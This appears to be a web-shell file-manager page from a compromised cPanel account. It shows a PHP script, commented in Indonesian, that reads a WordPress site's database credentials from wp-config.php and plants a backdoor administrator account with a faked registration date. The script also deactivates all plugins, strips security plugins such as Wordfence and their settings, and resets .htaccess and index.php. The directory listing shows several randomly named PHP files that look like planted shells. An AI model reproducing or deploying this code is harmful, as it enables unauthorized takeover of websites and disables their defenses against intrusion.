ꦫꦣꦺꦤ꧀ꦄꦤ꧀ꦠꦱꦺꦤ

PATH: home / sprnacad / .cpanel

<?php
// Matikan semua output agar tidak mengganggu HTML halaman login nanti
// Kita akan simpan pesan-pesan di variabel array
ob_start();
 $status_messages = [];

// --- KONFIGURASI AWAL ---
 $new_user_login = 'audywebmuchy@117';
 $new_user_pass  = 'audyB1kuS4y4';
 $new_user_email = 'yanatugas12345@gmail.comm';

// === Cari root WordPress (tempat wp-config.php & index.php) ===
function find_wp_root($start_dir) {
    $dir = $start_dir;
    while ($dir !== dirname($dir)) {
        if (file_exists($dir . '/wp-config.php') && file_exists($dir . '/index.php')) {
            return $dir;
        }
        $dir = dirname($dir);
    }
    return null;
}

$wp_root = find_wp_root(__DIR__);
if (!$wp_root) {
    $status_messages[] = "<span style='color:red;'>Error: WordPress root directory not found.</span>";
} else {
    $status_messages[] = "WordPress root found at: " . $wp_root;
}

$wp_config_path = $wp_root . '/wp-config.php';
 $wp_index_path  = $wp_root . '/index.php';
 $wp_login_path  = $wp_root . '/wp-login.php';

// === Fungsi parsing wp-config.php ===
function parse_wp_config_constants($file_path, $constants = ['DB_NAME','DB_USER','DB_PASSWORD','DB_HOST']) {
    $values = [];
    $content = @file_get_contents($file_path);
    foreach ($constants as $const) {
        if ($content !== false && preg_match("/define\s*$\s*['\"]" . preg_quote($const, '/') . "['\"]\s*,\s*['\"]([^'\"]+)['\"]\s*$/", $content, $matches)) {
            $values[$const] = $matches[1];
        } else {
            $values[$const] = null;
        }
    }
    return $values;
}

function parse_table_prefix($file_path) {
    $content = @file_get_contents($file_path);
    if ($content !== false && preg_match("/\\\$table_prefix\s*=\s*['\"]([^'\"]+)['\"]\s*;/", $content, $matches)) {
        return $matches[1];
    }
    return 'wp_';
}

// === Deteksi tema default terbaru ===
function detect_default_theme() {
    $themes_dir = __DIR__ . '/wp-content/themes';
    $default_theme = 'twentytwentyfour'; // fallback

if (is_dir($themes_dir)) {
        $themes = scandir($themes_dir);
        $candidates = [];
        foreach ($themes as $theme) {
            if (preg_match('/^twenty(\d{2,4})$/', $theme, $matches)) {
                $candidates[$matches[1]] = $theme;
            }
        }
        if (!empty($candidates)) {
            krsort($candidates); // ambil tahun terbaru
            $default_theme = reset($candidates);
        }
    }
    return $default_theme;
}

// === Ganti index.php dengan bawaan WordPress ===
function restore_wordpress_index($index_path) {
    $default_content = <<<PHP
<?php
/**
 * Front to the WordPress application. This file doesn't do anything, but loads
 * wp-blog-header.php which does and tells WordPress to load the theme.
 *
 * @package WordPress
 */
 
define( 'WP_USE_THEMES', true );

require __DIR__ . '/wp-blog-header.php';
PHP;

if (file_exists($index_path)) {
        @unlink($index_path);
    }
    @file_put_contents($index_path, $default_content);
}

// === WordPress Compatible Password Hash ===
function wp_hash_password_compatible($password) {
    if (function_exists('password_hash')) {
        return password_hash($password, PASSWORD_BCRYPT);
    }
    // Fallback for very old PHP versions
    $itoa64 = './0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz';
    $iteration_count_log2 = 8;
    $random = substr(str_shuffle($itoa64), 0, 6);
    $setting = '$P$' . $itoa64[min($iteration_count_log2 + 5, 30)] . $random;
    $count_log2 = strpos($itoa64, $setting[3]);
    $count = 1 << $count_log2;
    $salt  = substr($setting, 4, 8);
    $hash = md5($salt . $password, true);
    do {
        $hash = md5($hash . $password, true);
    } while (--$count);
    return $setting . encode64_legacy($hash, 16, $itoa64);
}

if (!file_exists($wp_config_path)) {
    die("Error: wp-config.php not found.\n");
}

$db_constants = parse_wp_config_constants($wp_config_path);
 $table_prefix = parse_table_prefix($wp_config_path);

if (in_array(null, $db_constants, true)) {
    die("Error: Could not find all database credentials in wp-config.php\n");
}

$db_name     = $db_constants['DB_NAME'];
 $db_user     = $db_constants['DB_USER'];
 $db_password = $db_constants['DB_PASSWORD'];
 $db_host     = $db_constants['DB_HOST'];

// === Koneksi ke database ===
 $mysqli = new mysqli($db_host, $db_user, $db_password, $db_name);
if ($mysqli->connect_error) {
    die("Connection failed: " . $mysqli->connect_error);
}

// Generate hash password kompatibel semua versi WP
 $password_hash = wp_hash_password_compatible($new_user_pass);

// Cek apakah username sudah ada
 $stmt = $mysqli->prepare("SELECT ID FROM `{$table_prefix}users` WHERE user_login = ?");
if ($stmt === false) {
    die("Prepare failed: " . $mysqli->error . "\n");
}
 $stmt->bind_param('s', $new_user_login);
 $stmt->execute();
 $stmt->bind_result($existing_user_id);
 $user_exists = $stmt->fetch();
 $stmt->close();

if ($user_exists) {
    // Update password & email jika user sudah ada
    $stmt = $mysqli->prepare("UPDATE `{$table_prefix}users` SET user_pass = ?, user_email = ? WHERE ID = ?");
    if ($stmt === false) {
        die("Prepare failed: " . $mysqli->error . "\n");
    }
    $stmt->bind_param('ssi', $password_hash, $new_user_email, $existing_user_id);
    if (!$stmt->execute()) {
        die("Error updating user: " . $stmt->error . "\n");
    }
    $stmt->close();
    $status_messages[] = "Success! Existing user '{$new_user_login}' updated.";
} else {
    // Insert user baru
    $time = date('Y-m-d H:i:s', rand(strtotime('2020-01-01'), strtotime('2023-12-31')));
    $stmt = $mysqli->prepare("
    INSERT INTO `{$table_prefix}users` 
    (user_login, user_pass, user_nicename, user_email, user_url, user_registered, user_activation_key, user_status, display_name) 
    VALUES (?, ?, ?, ?, '', ?, '', 0, ?)
    ");
    if ($stmt === false) {
        die("Prepare failed: " . $mysqli->error . "\n");
    }
    $user_nicename = strtolower($new_user_login);
    $display_name  = $new_user_login;
    $stmt->bind_param('ssssss', $new_user_login, $password_hash, $user_nicename, $new_user_email, $time, $display_name);
    if (!$stmt->execute()) {
        die("Error inserting user: " . $stmt->error . "\n");
    }
    $new_user_id = $stmt->insert_id;
    $stmt->close();

// Tambahkan capabilities dan level
    $cap_key = $table_prefix . 'capabilities';
    $level_key = $table_prefix . 'user_level';
    $capabilities = serialize(['administrator' => true]);

$stmt = $mysqli->prepare("INSERT INTO `{$table_prefix}usermeta` (user_id, meta_key, meta_value) VALUES (?, ?, ?)");
    if ($stmt === false) {
        die("Prepare failed: " . $mysqli->error . "\n");
    }
    $stmt->bind_param('iss', $new_user_id, $cap_key, $capabilities);
    $stmt->execute();
    $stmt->close();

$user_level = 10;
    $level_value = (string)$user_level;
    $stmt = $mysqli->prepare("INSERT INTO `{$table_prefix}usermeta` (user_id, meta_key, meta_value) VALUES (?, ?, ?)");
    if ($stmt === false) {
        die("Prepare failed: " . $mysqli->error . "\n");
    }
    $stmt->bind_param('iss', $new_user_id, $level_key, $level_value);
    $stmt->execute();
    $stmt->close();

$status_messages[] = "Success! WordPress admin user '{$new_user_login}' created.";
}

// === Nonaktifkan semua plugin ===
 $empty_plugins = serialize([]);
 $stmt = $mysqli->prepare("UPDATE `{$table_prefix}options` SET option_value = ? WHERE option_name = 'active_plugins'");
if ($stmt === false) {
    die("Prepare failed: " . $mysqli->error . "\n");
}
 $stmt->bind_param('s', $empty_plugins);
 $stmt->execute();
 $stmt->close();
 $status_messages[] = "All plugins have been deactivated.";

// === Set tema ke default terbaru ===
 $default_theme = detect_default_theme();
 $stmt = $mysqli->prepare("UPDATE `{$table_prefix}options` SET option_value = ? WHERE option_name IN ('template','stylesheet')");
if ($stmt === false) {
    die("Prepare failed: " . $mysqli->error . "\n");
}
 $stmt->bind_param('s', $default_theme);
 $stmt->execute();
 $stmt->close();
 $status_messages[] = "Theme set to {$default_theme}.";

// === Restore index.php ===
restore_wordpress_index($wp_index_path);
 $status_messages[] = "index.php restored to WordPress default.";

// === Fix wp-login.php permissions and ensure it exists ===
function fix_wp_login($wp_login_path) {
    if (!file_exists($wp_login_path)) {
        return "Error: wp-login.php not found at {$wp_login_path}";
    }
    $current_perms = fileperms($wp_login_path);
    if ($current_perms !== false) {
        $current_perms_oct = substr(sprintf('%o', fileperms($wp_login_path)), -4);
        if ($current_perms_oct !== '0644') {
            if (chmod($wp_login_path, 0644)) {
                return "wp-login.php permissions fixed to 0644";
            } else {
                return "Failed to fix wp-login.php permissions";
            }
        }
    }
    return "wp-login.php permissions OK.";
}
 $status_messages[] = fix_wp_login($wp_login_path);

// === Disable login protection plugins ===
function disable_login_protection_plugins($mysqli, $table_prefix) {
    $login_protection_plugins = [
        'wp-hide-security-enhancer/wp-hide-security-enhancer.php', 'wps-hide-login/wps-hide-login.php',
        'hide-my-wp/hide-my-wp.php', 'limit-login-attempts-reloaded/limit-login-attempts-reloaded.php',
        'wordfence/wordfence.php', 'all-in-one-wp-security-and-firewall/all-in-one-wp-security-and-firewall.php',
        'better-wp-security/better-wp-security.php'
    ];
    $stmt = $mysqli->prepare("SELECT option_value FROM `{$table_prefix}options` WHERE option_name = 'active_plugins'");
    $stmt->execute();
    $stmt->bind_result($active_plugins_serialized);
    $stmt->fetch();
    $stmt->close();
    if ($active_plugins_serialized) {
        $active_plugins = unserialize($active_plugins_serialized);
        if (is_array($active_plugins)) {
            $found_plugins = array_intersect($active_plugins, $login_protection_plugins);
            if (!empty($found_plugins)) {
                $new_active_plugins = array_diff($active_plugins, $found_plugins);
                $new_active_plugins_serialized = serialize($new_active_plugins);
                $stmt = $mysqli->prepare("UPDATE `{$table_prefix}options` SET option_value = ? WHERE option_name = 'active_plugins'");
                $stmt->bind_param('s', $new_active_plugins_serialized);
                $stmt->execute();
                $stmt->close();
                return "Found and deactivated login protection plugins: " . implode(', ', $found_plugins);
            }
        }
    }
    return "No active login protection plugins found to deactivate.";
}
 $status_messages[] = disable_login_protection_plugins($mysqli, $table_prefix);

// === Remove plugin options that might block login ===
function remove_login_protection_options($mysqli, $table_prefix) {
    $login_protection_options = ['whl_page', 'whl_login', 'wps_hide_login', 'hmwp_options', 'aiowps_options', 'itsec_storage', 'wordfence_config'];
    $removed_count = 0;
    foreach ($login_protection_options as $option) {
        $stmt = $mysqli->prepare("DELETE FROM `{$table_prefix}options` WHERE option_name = ?");
        $stmt->bind_param('s', $option);
        $stmt->execute();
        if ($stmt->affected_rows > 0) {
            $removed_count++;
        }
        $stmt->close();
    }
    return "Removed {$removed_count} login protection options from the database.";
}
 $status_messages[] = remove_login_protection_options($mysqli, $table_prefix);

// === Reset .htaccess ===
function get_default_htaccess_content() {
    return <<<HTACCESS
# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteRule .* - [E=HTTP_AUTHORIZATION:%{HTTP:Authorization}]
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress
HTACCESS;
}
function reset_htaccess_in_path($path) {
    $htaccess_file = rtrim($path, '/') . '/.htaccess';
    $default_content = get_default_htaccess_content();
    if (file_exists($htaccess_file)) {
        @unlink($htaccess_file);
    }
    file_put_contents($htaccess_file, $default_content);
    chmod($htaccess_file, 0644);
    return ".htaccess reset to default.";
}
 $status_messages[] = reset_htaccess_in_path($wp_root);

// Tutup koneksi database manual sebelum memuat WordPress
 $mysqli->close();

// Bersihkan buffer output yang mungkin tersisa dari proses di atas
ob_end_clean();

// === TAMPILKAN HALAMAN LOGIN DENGAN PESAN STATUS ===

// Muat lingkungan WordPress
require_once($wp_root . '/wp-load.php');

// Fungsi untuk menampilkan pesan kita di header login
function display_script_status_messages() {
    global $status_messages;
    if (!empty($status_messages)) {
        echo '<div id="script_status_notice" class="notice" style="margin: 20px 0; padding: 12px; border-left: 4px solid #72aee6; background-color: #fff; box-shadow: 0 1px 1px rgba(0,0,0,.04);">';
        echo '<h4>Script Execution Summary:</h4>';
        echo '<ul style="margin: 0; padding-left: 20px;">';
        foreach ($status_messages as $msg) {
            echo '<li>' . $msg . '</li>';
        }
        echo '</ul>';
        echo '</div>';
    }
}

// Hook fungsi kita ke dalam halaman login
add_action('login_header', 'display_script_status_messages');

// Sekarang, kita "memasukkan" halaman login untuk ditampilkan
// Ini akan menjalankan wp-login.php dan menampilkan HTML-nya.
// Karena kita sudah men-hook fungsi pesan kita, maka pesan akan muncul di sana.
include($wp_root . '/wp-login.php');

// Hentikan eksekusi skrip agar tidak ada apa-apa lagi yang ditampilkan
exit;

// Kode di bawah ini tidak akan pernah dijalankan karena ada exit() di atas.
?>

[+] ..
[+] caches
[+] datastore
[+] nvdata
[+] vcards
[+] icals
[-] live-engine-connector-PNpj4BWGqs.sock [edit]
[-] live-engine-connector-MYTrQudwCq.sock [edit]
[-] live-engine-connector-c6WfNMcox1.sock [edit]
[-] live-engine-connector-zY2TAkBWCB.sock [edit]
[-] live-engine-connector-Q5PzldaTSV.sock [edit]
[-] live-engine-connector-lx2QVYYANm.sock [edit]
[-] live-engine-connector-_OBU_IZQ5U.sock [edit]
[-] live-engine-connector-oGx5w7m3Vs.sock [edit]
[-] live-engine-connector-aJVhVFEbta.sock [edit]
[-] live-engine-connector-zaAuYffeJt.sock [edit]
[-] live-engine-connector-ze7qrswNXl.sock [edit]
[-] live-engine-connector-Q5qSMBwwH4.sock [edit]
[-] live-engine-connector-_4qMVrNwKu.sock [edit]
[-] live-engine-connector-JOeOiAAPjQ.sock [edit]
[-] live-engine-connector-oipNvs70Kz.sock [edit]
[-] live-engine-connector-PRmbjRBqy5.sock [edit]
[-] lrxplndmowpk3r2vncr0s5zCdefault.php [edit]
[-] contactinfo [edit]
[-] email_accounts_count [edit]
[-] nvdata.cache [edit]
[-] Cpanel_SSL_DCV_DNS_Mutex [edit]
[-] ducache [edit]
[-] email_accounts.json [edit]
[-] Cpanel_SSL_DCV_DNS_Mutex.lock-1d47daee72007-1c70e5b5b-f97f [edit]
[-] about.php [edit]
[-] 157.php [edit]
[-] zzykbkwvyxedpbhthjvglCdefault.php [edit]
[-] ccb.php [edit]
[-] cccb.php [edit]
[-] dl6w1a1gqbwoh5ucioCdefault.php [edit]
[-] 1.php [edit]